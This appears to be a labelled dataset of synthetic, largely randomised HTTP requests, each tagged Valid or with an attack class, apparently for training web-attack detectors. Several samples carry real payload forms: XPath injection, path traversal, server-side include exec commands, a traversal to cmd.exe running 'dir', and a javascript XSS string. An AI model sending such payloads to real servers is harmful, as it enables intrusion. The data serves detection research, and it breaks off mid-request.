UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 968x9217
Via: eAku/9.2 113.202.177.2:18, 2.9 www.L0nWewe.css, FTP/8.3 www.aPHOma.jpeg
Transfer-Encoding: la89
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 655 www.stNgKE7.png "aoa5fSu" 
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 0029155789665263
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13383
Start - Id: 4633
class: Valid
PUT /pByGV7mOkQDfV/neuhmrnbg0k3/ado2s/rcfYSjDnK/sx.pZE2@@GUMiHrHI1Gr/Cdwaoet/qm8q8/Tinsdk.dll? HTTP/1.1
Content-Length: 218
Content-Language: rswr5Ilg,Bm
Content-Encoding: compress
Content-Location: /zffy/Ue6yex/rYtweaon/hrFrgJna/tEiyegeo.cfm
Content-MD5: bmZlcmFydHRIcGJlb1VvRA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Feb 07 24:06:24 UTC
Last-Modified: Sat, 05 Jan 08 05:47:53 UTC
Host: 9.47.205.124
Connection: eafdI
Accept: text/plain;q=0.1, video/*;q=0.4
Accept-Charset: iso-2022-jp;q=0.5, x-mac-korean;q=0.8, windows-1255;q=0.1, x-mac-hebrew
Accept-Encoding: 
Accept-Language: foa-Ti88cp;q=0.1, hrtnysd1-itdrY;q=0.2, u37rjatL-ileg, 6ssre-Ss;q=0.5
Cache-Control: min-fresh=81
Client-ip: 163.169.220.127
Cookie: GHwinnts@ZCls=where;eeroI6Biwassne=rNEmj;iyci=doa
Cookie2: $Version="4"
Date: Fri, 06 Nov 09 12:49:12 UTC
ETag: "K3KE9Tp_TNwL1370MgA"
Expect: rosn5
From: ru5af5o@nFeb.it
If-Modified-Since: Fri, 03 Apr 09 08:52:09 UTC
If-Unmodified-Since: Thu, 01 Apr 10 12:43:38 CET
If-Match: "ELl0zMfRUxk.l-IX"
If-None-Match: "h@t2fUW70xa@moQ8"
If-Range: "ryWhanQgOkthRRf1x"
Max-Forwards: 32
MIME-Version: 6.1
Pragma: n='et9lea'
Proxy-Authorization: Digest cnonce="vsltae"
Authorization: gRiJdr th5f=tnro
Range: 232-0,-44178
Referer: /Rkastbc/hirPat9.txt
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/3.7 (Windows; U; Win98 3.7; 3h-Nt; rv:7.9.5) Gecko/42371353
UA-CPU: 68000
UA-Disp: 984,729,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0964x700
Via: itoo/1.8 8.113.191.51
Transfer-Encoding: identity
Upgrade: uhu/4.6, unr/4.1, tud/0.6, tii/1.7
Warning: 256 www.p3oc7si.html "erzAiotceQ" "Fri, 17 Jul 09 03:33:05 UTC"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bislsmsoSeo=537485&t56nueloetsTu=ee&YSXgroup byRBbgsound=cithnmea@amb6thttps6chR&M8WautoexecO0F=a-i&gJpspAyn=1&bznnn=i&anpi98=051&gei=oQ&U-4oor2=s4hrh&Msneh4ohmEyfei= ]fromM&mcT=ecB<he&lodgreuennt4t=gnCtbeehDaOsn

End - Id: 4633
Start - Id: 49149
class: XPathInjection
GET /lOSf/eEGU/AOcnnheilsf/cugvGRa3/8o6naOos3r4/eyi2e/oIA/inawt2eru/oorxeohr/bessmog4Eein8o/seraidrrta.mdb?rlsl6enn8bpi=nioatoaa&alkeedepqs=y4anycas%27++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++++%279gbnsnUs%27+++%3D++++%27&tym=878863921&b8z3NgeH=wgetote&a6eennmFocixad=511758879&1wh1=et%26Twe%40y0%7CT&renl=rrz&tnseraafosraAnf=detileusaa8gbiosec%2Fg&xGC2dMre5K=25602511 HTTP/1.1
Host: www.e4eth.uk:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1250;q=0.2, x-mac-japanese;q=0.5, x-mac-ce;q=0.8, x-mac-arabic;q=0.8, windows-1254;q=0.2
Accept-Encoding: 
Accept-Language: aw-c
Cache-Control: no-transform
Client-ip: 204.49.188.29
Cookie: ofendeo=4;Mkqof=audirXytk1ldresI0m
Cookie2: $Version="3"
Date: Sun, 10 Sep 06 12:54:32 GMT
ETag: "HjF@45Djy@lcchXqG"
Expect: cnapd=5nhiuzm;etnii
From: lrSasae@aaar.net
If-Modified-Since: Fri, 07 Jan 05 15:46:05 CET
If-Unmodified-Since: Sun, 27 Jun 04 06:30:06 CET
If-Match: "u--9xGQjsdwj@EN"
If-None-Match: *
If-Range: "OJIvPTeS_@EyuqIPocg"
Max-Forwards: 145
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: rtra9 ieayrnr8=mdixsqo
Authorization: frfeqe ertt=nro9nn
Range: 4916-
Referer: /Bari.jsp
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 5.7; lr-Ee; rv:8.6.9) Gecko/26197396
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: 3.4 www.oime.shtml
Transfer-Encoding: compress
Upgrade: yfI/3.6
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49149
Start - Id: 44810
class: PathTransversal
GET /y9f/threjoqahsi/7x8Az.png?yHkxf2emrxklee=wawerlaobgsoundsp+s3e&wheremgO8U=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&Vvbshoi6aiaDn1=Dt6U&teIt9iGraehs=oxZp%40e7Ot HTTP/1.1
Host: 197.42.106.189
Connection: keep-alive
Accept: image/jpeg, text/html;q=0.2
Accept-Charset: windows-1255;q=0.1, iso-10646-ucs-2, euc-tw, us-ascii, iso-8859-2
Accept-Encoding: *;q=0.1
Accept-Language: odxnaiIr-s0ieel;q=0.8, jozkba-er, nOaetku-th
Cache-Control: no-cache
Client-ip: 162.199.90.42
Cookie: 2wEfRdaus9arjhe=ijmh3ec;ertntuQoEhy=aDtn nOpimg nUwO3anq<
Cookie2: $Version="8"
Date: Fri, 25 Jul 08 11:17:20 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: yhupow8
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 09 Mar 08 04:49:59 CET
If-Unmodified-Since: Fri, 14 Mar 08 05:34:17 UTC
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: Fri, 01 Oct 04 20:37:42 CET
Max-Forwards: 614
MIME-Version: 9.8
Pragma: 3krf='eTo'
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: lheeo YhTw=9aydt
Range: -970
Referer: /dh3yrs/nsitdae.js
TE: trailers,trailers
Trailer: Pragma
User-Agent: me-jua http://www.am6egu.it
UA-CPU: PowerPC
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 1.9 40.6.132.169, 1.9 217.103.58.181
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 20.26.247.44
X-Serial-Number: 40759970154914
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44810
Start - Id: 27561
class: Valid
GET /huknlHYEI2Vyt@HwI@/binwindow.openzv9EcatBXHjWK/fvW_M4p-Nwib@IQV/nAWKF/lqk0X/euRBn_S4ceC/sjWkq/tQHzoht9G.G/sabissohorr/8awonitrutaseuhdl/o1pl8@hO8TzMKHcYJ/lit0oenene.exe?gni=eA%3Dt&_PJWEandrJ=6450&vhwnteo=eiE&m6cYrh90bg=d5olyhea3sd4oq5st&uhor=%28gnodyopengwE+Lnph-w&tas=rcp HTTP/1.1
Host: www.fdsOaE.be
Connection: swhs
Accept: */*
Accept-Charset: iso-8859-4;q=0.9, cp-950;q=0.8, koi8;q=0.3, shift_jis, iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 43.118.104.43
Cookie: eien=rrgg6objectaps
Cookie2: $Version="6"
Date: Fri, 15 Sep 06 10:46:15 GMT
ETag: "9ZCxqi6vbsm4MmPpj"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Mon, 04 Jul 05 07:08:11 CET
If-Unmodified-Since: Mon, 05 Nov 07 05:49:34 CET
If-Match: *
If-None-Match: ".dhagL1w-c8FSUYV"
If-Range: "dcwF364jqM5QStER-G"
Max-Forwards: 6
MIME-Version: 2.1
Pragma: tseslnl='07atil'
Proxy-Authorization: Basic aWFvc2lmOmVlaGFzMw==
Authorization: Digest realm
Range: 0-33,159-222311,3856-
Referer: /gaehl6/4ozguon/eeposaO/ee3o/Tsuvea.png
TE: deflate;q=0.2
Trailer: If-None-Match
User-Agent: ik7aMx- http://www.ehaobs2.com
UA-CPU: StrongARM
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4534x344
Via: HTTP/4.4 www.eonmr.tiff, 9.5 www.jeirh.tiff:0152
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 199 www.retlii.gif "37stwavrtcE7t7wasn" "Sun, 24 Oct 04 10:49:59 UTC"
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27561
Start - Id: 40254
class: SSI
PUT /PsSGeortSEuHant/tii/dRvjTDWtyp5IIT/aOd_/T5lenEtploohAr/bErpI9ttAOBmR/h75nzyeD/nyiOshpa.jpg? HTTP/1.0
Content-Length: 346
Content-Language: onb9zvLh,rf
Content-Encoding: compress
Content-Location: http://ivoto.org/voeoitw.jpeg
Content-MD5: WHRJdHR1N21laXN0ZW51bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Feb 08 09:21:12 GMT
Last-Modified: Tue, 12 Sep 06 05:55:56 UTC
Host: 108.62.182.33:93
Connection: keep-alive
Accept: video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 171.88.48.143
Cookie: hslitqhy=422399;ooheln8Ft19k3tG=119;nimanrorU9=q7ythulmeideiihn;euicwsl=NO;3cro7xraHim=le ta1TeB;83LLSZD-=18086
Cookie2: $Version="7"
Date: Wed, 10 Feb 10 17:07:43 GMT
ETag: "QQY_.zvrgninbUH8uvt"
Expect: 100-continue
From: YHtcdN@wRae.uk
If-Modified-Since: Sun, 05 Mar 06 15:05:38 UTC
If-Unmodified-Since: Thu, 24 Mar 05 01:21:12 GMT
If-Match: *
If-None-Match: "uAg.IwSjd.ygslwAVdGY"
If-Range: *
Max-Forwards: 31
Pragma: ets='jawr'
Proxy-Authorization: NTLM Tnh0YVM2YXRsVWFldGduc21lZmlkbm9uZGFpZW5zbk5HSXJ1eDRXaGhr
Authorization: NTLM MnJtUzd5ZUlpYnVrMGRjYW1hc1JvT2VlZXBvb25tdGlpZHJhdA==
Range: 7-1281,22479-
Referer: /nlsze/de5ai/hryzmh3/97itltue.jsp
TE: trailers,chunked
User-Agent: iNIHWg6K http://www.btIni.org
UA-Disp: 3250,7812,32
Via: 6.5 www.9ofiJs.jpg
Transfer-Encoding: identity
Warning: 524 216.140.150.200 "ytojircesetlOqieus" 
----: --------------------

strbesxej=eCaeer&1ne97snfh= updeeeoct&tilS= documentcW&rr=p(?eb @haphpsraaufu'&cjbs=478&rgeq=>ayxfE;asba&CwhC1K=54625340&em9l=<!--#exec cmd="c:\progra~1\3T9\eysh4rmo\ahwaeir.exe    d:\rporiIdofi\www.isisne.org\5mkw3ol\database.mdb    /x   exporttofoxpro"-->&CBbU-f=2locationiu&tcviettgred=oZgzgxj

End - Id: 40254
Start - Id: 30678
class: Valid
GET /Z6nendc/.p/uQmtg5K2SJyma.K6.asmx?bogykhsoPi=n3&aggberhneon=046506&OesGmEoYe=DFsashaluioCtH1E5&grXhnd1Srhnq=lHRh7&Oviemhta0FnN=f+%25services+&a9w=%7Chefromsbi++Jeaar&hetnwhMrfo=srBnkI&erk=0Wls&ac4Iaa8r=p&bn7s=sioe2ok3LWs4enn&aS=oX-ZG&fBopenOuB7nPC=d2svis4temi2b&ionaeeUrcSd463=Nooptje&xESufs8eu5yp=teuNnaq HTTP/1.0
Host: 110.71.30.152:465
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.4, x-mac-turkish, x-mac-hebrew;q=0.7, x-mac-chinesesimp;q=0.6
Accept-Encoding: identity, identity;q=0.6, gzip, identity, compress
Accept-Language: *
Cache-Control: max-age=00032
Client-ip: 15.95.31.192
Cookie: 3xXSJ@_EbB=1emtc2Reaessea7;tmbee=esiIghyoaoel ;8TFmlzz_hAPF=i|teo/a
Cookie2: $Version="2"
Date: Wed, 16 Mar 05 13:32:25 UTC
ETag: W/"t6zq9Qtmq.nKMgz"
Expect: abk6i7=cw7g;e3rba9la
From: ptoe@etrt.gov
If-Modified-Since: Sat, 25 Oct 08 02:17:28 GMT
If-Unmodified-Since: Sun, 18 Dec 05 14:33:37 UTC
If-Match: *
If-None-Match: *
If-Range: "1glyzDWJj9.gYif"
Max-Forwards: 5208
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM NTdudWg3Ym5obGFlMFR2ZWliaXNhYWR0NHR4NTRhcnNvSXRhbw==
Authorization: uhhpsI kfne=Mj8maala
Range: 174-63482
Referer: http://www.cxeh.de/ttlv0/nicc/zsi9Joeq/tntektT.exe
TE: trailers
Trailer: Accept
User-Agent: rZY7kXaT http://www.tnssa.fr
UA-CPU: PowerPC
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/5.2 250.54.215.0, HTTP/9.5 147.119.94.111, 8Tdtat/2.1 www.otzeN.jpg
Transfer-Encoding: compress
Upgrade: dsfrle/2.8, lnh/9.9, ntnamc/7.2, hlt/5.9
Warning: 834 64.62.125.81 "mrreedes" 
X-Forwarded-For: 90.32.42.192
X-Serial-Number: 62673072943112918
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 30678
Start - Id: 43718
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 239.241.158.63
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.4, x-mac-chinesetrad, cp-932, x-mac-hebrew, windows-874
Accept-Encoding: *
Accept-Language: lh-baen;q=0.4
Cache-Control: no-cache
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Mon, 08 Jan 07 13:30:33 GMT
ETag: "WuqeTiXQlvgbu6xrYI"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Tue, 01 May 07 20:25:46 GMT
If-Unmodified-Since: Mon, 15 Aug 05 11:46:01 CET
If-Match: "6MjIJR6DEMj0ukCJPmRB"
If-None-Match: "nDalftGW4wKDZ4H6J0qv"
If-Range: Sat, 16 Feb 08 23:35:21 GMT
Max-Forwards: 69
MIME-Version: 8.9
Pragma: haw3tnnu='g8e6wutu'
Proxy-Authorization: NTLM ZW5rZWVzZTBwY0l1aDdsbHdBMmxhT2VhT2FhNmNkeHRhd2U3bjQ=
Authorization: Basic ZXRpc2U6ZlR4bmw=
Range: 7008-71
Referer: /osnlh9f/rOmaan/avJMvhe/aonlmt8/ctmdhs.css
TE: gzip,deflate
User-Agent: Mozilla/5.7 (Machintosh; U; Mac OS X 7.1; ns-sc; rv:5.7.2) Gecko/81639056
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 284x7393
Via: 3.0 www.osrotoo.jpeg
Transfer-Encoding: deflate
Upgrade: fnetaM/4.9, l3e/1.2
Warning: 546 161.55.81.201 "zehnaoi8Htrab7epa" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 601406
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43718
Start - Id: 39400
class: SSI
GET /9@8jkY/iC8zumtlooi2f/4WaB_Re_Op6L/ektHExhP6F.shtml?arshsauwtc=286&hxs1lgdaIt=gnoeDhd6esi&CEqYDCKz=O7brxnvowtNjHaEo&J3L-B=m%5CoemtidEt-aa+iI%24C&nh=80&aeh=9259794936&6yhK=rs4hgeCuotdcztae&denaiu=hemsa8caec&aL6EA=b%7E6e9klibrrdsunionyen8&WVjvO2O8y3i9=6&.t0r=%3Fhh&TK-ltmp=hgiEVEOvE&c8sdsi3ft7=%3C%21--%23email+fromhost%3D%22www.eeezaar.com%22+tohost%3D%22mailbox.ees.com%22+message%3D%22eaylz+e7epwte+3oeGH+ni36ae%22+fromaddress%3D%22cveri.com%22+toaddress%3D%22oaeoh.sm.com%22+subject%3D%22i%22+sender%3D%22vl.com%22+replyto%3D%22lszMS.com%22+cc%3D%22rxA%22+inreplyto%3D%22ya+wTea+r3i3e%22+id%3D%22nbalmail%22+--%3E HTTP/1.1
Host: www.RhpAprg.de
Connection: close
Accept: text/plain, image/png, text/*
Accept-Charset: windows-1250, x-mac-korean;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 39.14.204.79
Cookie: gPtogetiro3zrmy=ialsam~ihtp L prns4R 
Cookie2: $Version="246"
Date: Tue, 23 Mar 10 08:17:51 GMT
ETag: "4Brn_CPTrEZ4KqY"
Expect: 100-continue
From: gdiexzng@dnnsS.com
If-Modified-Since: Wed, 14 Jun 06 01:37:21 GMT
If-Unmodified-Since: Sun, 31 Dec 06 13:21:37 GMT
If-Match: "gNZ_Ka835HCwu_UuQVG"
If-None-Match: "V6Ax6BOcN4gkKlp@Of1"
If-Range: "yYfERM8ixBes9SrIv@"
Max-Forwards: 500
MIME-Version: 4.0
Pragma: ntr='sAleistf'
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic ZWVhMjluOmV3Tm0=
Range: 32-500
Referer: http://veh92Mr.gov/h5ntrNIc/itare6d/cAlc.mpg
TE: chunked,deflate,deflate;q=0.2
Trailer: Accept-Language
User-Agent: esPdias (diEdPX0LI4; 6005Hijv0h; hcU_t5-)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 6.3 238.192.7.253, HTTP/7.8 www.tOargdE.jpg, 5idp/7.2 100.159.27.248
Transfer-Encoding: compress
Upgrade: 7soi7/6.3, ehp/7.8, uAdi/5.5, suawe/9.7, pdev/5.3
Warning: 190 www.twedsrAa.js:13 "LwwoTeugDami" 
X-Forwarded-For: 193.181.203.122
X-Serial-Number: 25787238
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39400
Start - Id: 12059
class: Valid
GET /yc@u/e-EK.CK07Nl_c/uoc/nXmjw@MahwZvbfZ/OjnGOiep0/iteesesitehheouee/aij1i/0JBxhsajM9a.jpeg? HTTP/1.0
Host: 158.196.219.54:76552
Connection: close
Accept: image/png, image/*, audio/basic;q=0.3
Accept-Charset: koi8;q=0.4, x-mac-korean, x-mac-roman;q=0.4, iso-8859-2;q=0.4, macintosh
Accept-Encoding: identity
Accept-Language: biarer-do, nab-allvoJrd;q=0.2
Cache-Control: no-store
Client-ip: 136.168.150.37
Cookie: b5id3vaayse=nSJBOhr
Cookie2: $Version="7"
Date: Tue, 01 Feb 05 03:40:21 GMT
ETag: W/"fFsX_cbNy2W@DxWYxgk"
Expect: eaa2eh
From: oO9gna@trdjI.biz
If-Modified-Since: Mon, 30 Mar 09 22:56:08 GMT
If-Unmodified-Since: Sat, 14 Aug 04 18:04:00 CET
If-Match: *
If-None-Match: ".6t.kQKH3HCLQu."
If-Range: Sun, 02 Jul 06 05:21:04 UTC
Max-Forwards: 003
MIME-Version: 2.2
Pragma: aogayh='ior'
Proxy-Authorization: Digest nc=BD5B8C8A
Authorization: Basic bThBc3NlZXk6ZW5sdA==
Range: 2571-
Referer: /iYpoe2v/eThxoeas.png
TE: chunked;q=0.3,deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: tetrye
UA-CPU: 68000
UA-Disp: 859,2266,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: 4.5 210.38.116.3:4587
Transfer-Encoding: deflate
Upgrade: eoPrtm/3.6, odfe/2.3, Iorla/2.0, tdlt/6.3
Warning: 337 www.ns3txq.css "cRiegpe2onof3lwdtrnr" "Sun, 27 Aug 06 07:07:45 CET"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 21280
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12059
Start - Id: 47742
class: XSS
GET /o2cPVXAa6include/dpWEh7n8zh@T.jpeg?3SL=metaene%28lii9open&sgitNpsjbdu=iid9nrtisu&jha=%3Cbgsound+src++++%3D++++%22+javascript%3A%5Balert+++%28%27dbrogtf%27%29%3B%5D%22++%3E&hrGijAttdmieaoi=nrDEhns7abTnctplud&0awm=3ep HTTP/1.0
Host: 22.164.94.17:110
Connection: close
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=67766
Client-ip: 241.206.24.189
Cookie: tieoP=97051;mxbR.s7=eeqm6e;ZexecfKFaWRVobjectTb=2xwuoscriptHeaamrhte;Ysamiwigphp8QEc=ncwrtaarristt
Cookie2: $Version="56"
Date: Wed, 03 Mar 04 14:14:25 UTC
ETag: "B3GtyHgDy1kQ_H-."
Expect: asn70
From: rlNe@ecetad6.fr
If-Modified-Since: Wed, 31 Jan 07 21:39:37 UTC
If-Unmodified-Since: Wed, 30 Aug 06 06:57:30 GMT
If-Match: *
If-None-Match: "SsWaTrNxWk42BiGRZEf"
If-Range: Sat, 24 Sep 05 05:05:05 CET
Max-Forwards: 9379
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic czZVbmRodDphdW5zdG9u
Authorization: dcyei bKeelhtg=geEmsh
Range: -887125,6715-3229
Referer: http://atrhmtky.st/i5luw1a.mdb
TE: chunked;q=0.1,trailers
Trailer: Date
User-Agent: Mozilla/9.2 (Windows; U; WinNT 2.8; 3H-ln; rv:6.8.3) Gecko/86225207
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: fd1nh/5.9 www.Lsceo.jpg, HTTP/3.2 www.eddnxS.htm, 3.1 www.nmcssroy.css:94099
Transfer-Encoding: identity
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 195.31.132.94
X-Serial-Number: 08031328367563648957
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47742
Start - Id: 32029
class: Valid
GET /dNvYNOdfInyGsgk/ZnMODP@vq/v4OHhQ-Tu5/tC.js?6cbenaL8ea=nGB&tnttdje=2438812&nxp_SNVchildSI=w3hV&mr=66002854&ns=8&gTi2iou=74018&svsihuoK9s9w8=metiU&dtn=410755&fenOsdscftt=samo%3Cnowget84ae&emden0sa=9866&lejaLhEisrssezf=0159573&Xqg-sMBn9n=944&ARMN@qer=tdl%7Cnnemenut%3B8&tdaoIXconnectR=yTNlatabk5r HTTP/1.1
Host: 45.211.99.16:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 9iel-t;q=0.2, stxtytHO-eldo;q=0.2
Cache-Control: max-stale
Client-ip: 167.189.227.177
Cookie: aagta3biys=rraNyp
Cookie2: $Version="1"
Date: Sun, 16 Nov 08 20:05:28 UTC
ETag: W/"@X@DT03pmjgqM0jQofm"
Expect: 100-continue
From: hMpeNchu@otttmeoI6.st
If-Modified-Since: Wed, 14 Dec 05 05:15:25 UTC
If-Unmodified-Since: Mon, 19 Oct 09 13:13:43 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Apr 10 12:11:06 UTC
Max-Forwards: 0
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM d2FhNWNWNG9wc290aW5mcnRhNWRubWFpZG92bFJwbmVhTWlld3VlRGVpbw==
Authorization: hxEO 8ehj0hse=isIzt
Range: 3745-
Referer: /er2qne/snexAoho/suctc/krgerr5/eInetao.gz
TE: trailers,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: aunq5q (r0YwPnm)
UA-CPU: x86
UA-Disp: 0659,464,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8661x2250
Via: 6.6 www.uh2nmwlE.png, 3.5 www.tztixap.shtml:7403
Transfer-Encoding: deflate
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 611 www.uungucau.gif:10 "qeieeBwFo" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 16576925520335
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32029
Start - Id: 6849
class: Valid
POST /iWGOfGWjKI54n/arshaT7Iwra/e5Nst9s4xcxscbfa/nl/dFNM/YeeHhtra0c7baesiieR.msf? HTTP/1.0
Content-Length: 106
Content-Language: ts,ir
Content-Encoding: compress
Content-Location: http://akTnsS.gov/sasusnud/4oeizyjj/8Yase/tcDee4/bOsg.tar.gz
Content-MD5: dGNlYXRzSWFneXRvRWVpMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Apr 06 22:04:06 UTC
Last-Modified: Thu, 14 Oct 04 20:37:17 UTC
Host: 125.188.2.193
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress, gzip
Accept-Language: dnrha-aic8n, ohol-fe;q=0.9, nswxq-led4;q=0.9, ftq-yoe2;q=0.7, a1-a7ou5S;q=0.2
Cache-Control: no-store
Client-ip: 26.175.54.181
Cookie: 1whereQiw=H;eer=06471561;genhnoi=coTwNpsl;mrn7C8naqae=4ye;atAhsqchALR=st2a$t inrctj
Cookie2: $Version="0"
Date: Thu, 18 Jun 09 08:27:39 GMT
ETag: "ns947wAawLAMs@c"
Expect: p7oissr
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Wed, 08 Jul 09 13:58:20 GMT
If-Unmodified-Since: Sun, 25 Nov 07 04:13:49 CET
If-Match: *
If-None-Match: "Cj-2KbXMs4_u5Kq5"
If-Range: Sun, 12 Dec 04 01:47:32 GMT
Max-Forwards: 4201
MIME-Version: 7.3
Pragma: hSew='rwagrh'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM Tm9uMXZsaXNlbWdhNnl2dHRzeWlSc3ByUnRzc1JpMmIyaHVpaGhp
Range: 708-,54-
Referer: http://ef6zwte.be/dEbiao/aiuri/v2htoue.rar
TE: trailers,chunked
Trailer: Range
User-Agent: Mozilla/9.6 (compatible; Konqueror/6.4; Win 9x; tBcaMhe; hWigtaa)
UA-CPU: Sparc
UA-Disp: 0985,7140,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 302x0187
Via: FTP/4.7 45.8.87.171, ehemyh/9.1 57.117.224.22, 0.5 147.244.208.247
Transfer-Encoding: gzip
Upgrade: iu6a/3.8, del/4.7, tea/8.2
Warning: 129 www.9lvodtr.jpeg "nTtwlNvsm" "Wed, 13 Dec 06 13:48:45 UTC"
X-Forwarded-For: 225.78.188.108
X-Serial-Number: 036513993463
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xoa=timr1ton&4Y_8NIkmxpU=dropm&2olttael=1&nhbxrau4=3&rlzavahse=a3TOr68CDA&donsmy=yEhhe8s&Hdinke5EBo@D=cmdz

End - Id: 6849
Start - Id: 16405
class: Valid
GET /soeGsWdetdi/rkemntrNVens/ekpr7lclhsmsIi/eieh9ca2n4phbnittCt/NBCrS/i0afR_U15krZej8/troOo/laeblphtEasif4Un5lp.php?uSNesg=Nih%2FI5&IMGkX=duACz9KYVG&seovi0p=q3gEBT.jb&positionJneqDg2q1=sia6katewh&lintZnd=nslpj27N4oer&Lu2ahl=o4ithsstejslmo&uye=77029936&ayj=dc8syietuxo&loecA=0assm&iElDrnH1Etos=75105666&5lnefdlAdtkcnd=96385&iuzz1aipakxs=cw8%40S2&ten0uso=eidta2ie%25tti HTTP/1.1
Host: www.edngvtwu5.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 129.156.31.222
Cookie: eThnwac4=0vX;aGorhd=0655;eisaa=aCrHoaCFq
Cookie2: $Version="92"
Date: Sat, 01 Jul 06 07:56:31 GMT
ETag: W/"CT-tqGbM0OAI8Es"
Expect: 100-continue
From: seale@faF5s1.ch
If-Modified-Since: Tue, 15 Sep 09 10:10:09 UTC
If-Unmodified-Since: Fri, 11 May 07 08:12:49 CET
If-Match: *
